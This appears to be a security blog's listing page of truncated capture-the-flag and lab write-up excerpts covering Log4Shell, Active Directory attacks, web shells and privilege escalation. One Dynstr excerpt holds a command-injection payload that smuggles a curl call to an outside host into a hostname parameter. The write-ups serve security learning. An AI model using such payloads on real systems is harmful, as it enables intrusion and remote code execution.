Lab – Exploiting Log4Shell (CVE-2021-44228)
Background: On December 10th, 2021, the Log4Shell vulnerability, a “0-day” exploit in log4j2, appeared on Twitter. In this post, we will explore how to exploit it with LDAP in a lab environment. In o...
We are solving Vault from PG Practice. This machine involves planting malicious files on an SMB share to steal hashes. For root, we will abuse GPO Permissions and explore 2 unintended privilege esc...
We are solving Intelligence, a nice Windows machine on HackTheBox, created by Micah. For user, we will enumerate PDFs on a webserver & will use both the content & metadata to find valid cre...
We are solving Hutch from PG-Practice. For user, we will get credentials from LDAP & use them to upload a web shell via WebDAV. For root, we will read a LAPS password for the intended way &...
We are solving Pivotapi, a 50-point Windows machine on HackTheBox. This one involves some Reverse Engineering, MSSQL, and Active Directory Attacks like Kerberoasting, ASREPRoasting, and various mis...
We are solving Dynstr, a 30-point Linux machine on HackTheBox that involves a Dynamic DNS Service & a Command Injection. Notes Command Injection GET /nic/update?hostname=$(curl+168431223/x...
We are solving Heist from PG Practice. Heist is a really cool Windows machine that involves stealing a hash, reading a gMSA password & exploiting the SeRestorePrivilege. Links https://gith...
We are solving Kevin, an easy-rated Windows machine on PG Practice that involves a SEH Based Buffer Overflow. Notes Starting PoC #!/usr/bin/python from pwn import * from urllib import parse fr...
We are solving Sink, a 50-point Linux machine on HackTheBox that involves HTTP Request Smuggling & retrieving secrets from Localstack. Notes Reads https://nathandavison.com/blog/ha...
In a recent video, someone asked a good question in the comments about why we can shut down a box when our user has SeShutdownPrivilege listed as disabled: whoami /all ... Privilege Name ...